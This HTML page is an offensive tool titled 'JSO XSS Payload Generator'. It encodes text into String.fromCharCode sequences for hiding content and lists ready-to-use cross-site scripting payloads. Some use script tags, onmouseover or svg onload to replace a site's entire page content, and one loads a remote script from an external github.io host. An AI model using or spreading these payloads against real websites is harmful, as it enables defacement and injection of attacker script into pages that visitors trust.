<!DOCTYPE html>
<html>
<head><title>JSO XSS Payload Generator</title>
<style>
  body {
    font-family: Arial, sans-serif;
    background-color: #111;
    color: #eee;
  }

  .container {
    display: flex;
    flex-direction: row;
    justify-content: space-between;
    margin-bottom: 20px;
  }

  .box {
    padding: 20px;
    margin: 10px;
    border: 1px solid #333;
    border-radius: 10px;
    width: 45%;
    background-color: #222;
  }

  .box textarea {
    width: calc(100% - 40px); /* Adjusted to account for padding */
    box-sizing: border-box;
    padding: 10px;
    background-color: #333;
    color: #eee;
    border: 1px solid #444;
    border-radius: 5px;
  }

  .box label {
    display: block;
    margin-bottom: 10px;
    color: #ccc;
  }

  .button-container {
    margin-top: 20px;
    display: flex;
    justify-content: space-around;
  }

  button {
    padding: 10px 20px;
    border: none;
    border-radius: 5px;
    background-color: #444;
    color: #eee;
    cursor: pointer;
    font-size: 16px;
  }

  button:hover {
    background-color: #555;
  }

  .javascript-example {
    padding: 20px;
    border: 1px solid #333;
    border-radius: 10px;
    background-color: #222;
    width: 100%;
  }

  .javascript-example code {
    display: block;
    color: #ccc;
  }

</style>
</head>
<body><br>
<center><h1>JSO XSS Payload Generator</h1><h3>JSO : JavaScript Overlay</h3></center>
<div class="container">
  <div class="box">
    <label for="enc_input">Encoded Input</label>
    <textarea name="enc_input" id="enc_input" rows="2" onclick="this.select()"></textarea>
    <div class="button-container">
      <button onclick="encode()">Encode</button>
    </div>
  </div>

  <div class="box">
    <label for="enc_result">Encoded Result</label>
    <textarea name="enc_result" id="enc_result" rows="2" readonly></textarea>
    <div class="button-container">
      <button onclick="copyToClipboard('enc_result')">Copy Encoded Result</button>
    </div>
  </div>
</div>

<div class="container">
  <div class="box">
    <label for="dec_output">Decoded Output</label>
    <textarea name="dec_output" id="dec_output" rows="2" onclick="this.select()"></textarea>
    <div class="button-container">
      <button onclick="decode()">Decode</button>
    </div>
  </div>

  <div class="box">
    <label for="dec_result">Decoded Result</label>
    <textarea name="dec_result" id="dec_result" rows="2" readonly></textarea>
    <div class="button-container">
      <button onclick="copyToClipboard('dec_result')">Copy Decoded Result</button>
    </div>
  </div>
</div>

<div class="container">
  <div class="javascript-example">
    <h2>XSS Payload Examples</h3>
	<h4>
    <code>1.) &lt;script&gt;document.documentElement.innerHTML=String.fromCharCode(Past Char Code Here !);&lt;/script&gt;</code>
    <code>2.) &lt;a onmouseover=document.documentElement.innerHTML=String.fromCharCode(Past Char Code Here !);&gt;SEEME&lt;/a&gt;</code>
    <code>3.) &lt;svg onload=document.documentElement.innerHTML=String.fromCharCode(Past Char Code Here !);&gt;</code>
    <code>4.) &lt;script src=https://aggressiveuser.github.io/food/simbba.js&gt;;&lt;/script&gt;</code>
    <code>⠀ Note: In 'payload.js' paste below code with your char code.</code>
    <code>⠀ document.documentElement.innerHTML = String.fromCharCode(Past Char Code Here !);</code>
    <code>⠀ For Example: https://aggressiveuser.github.io/food/simbba.js</code>
	</h4>
  </div>
</div>

<div class="button-container">
  <button onclick="resetForm()">Reset</button>
</div>

<script>
function encode() {
  var source = document.getElementById("enc_input").value;
  var str = source;
  var length = str.length;
  var encodedStr = str.charCodeAt(0);
  var position = 1;

  while(position < length) {
    var n = str.charCodeAt(position++);
    encodedStr = encodedStr + ", " + n;
  }

  document.getElementById("enc_result").value = encodedStr;
}

function decode() {
  var source = document.getElementById("dec_output").value;
  var source_array = source.split(',');
  var decodedStr = String.fromCharCode.apply(null, source_array);
  document.getElementById("dec_result").value = decodedStr;
}

function copyToClipboard(inputId) {
  var inputElement = document.getElementById(inputId);
  inputElement.select();
  document.execCommand("copy");
}

function resetForm() {
  document.getElementById("enc_input").value = "";
  document.getElementById("enc_result").value = "";
  document.getElementById("dec_output").value = "";
  document.getElementById("dec_result").value = "";
}
</script>

</body>
</html>
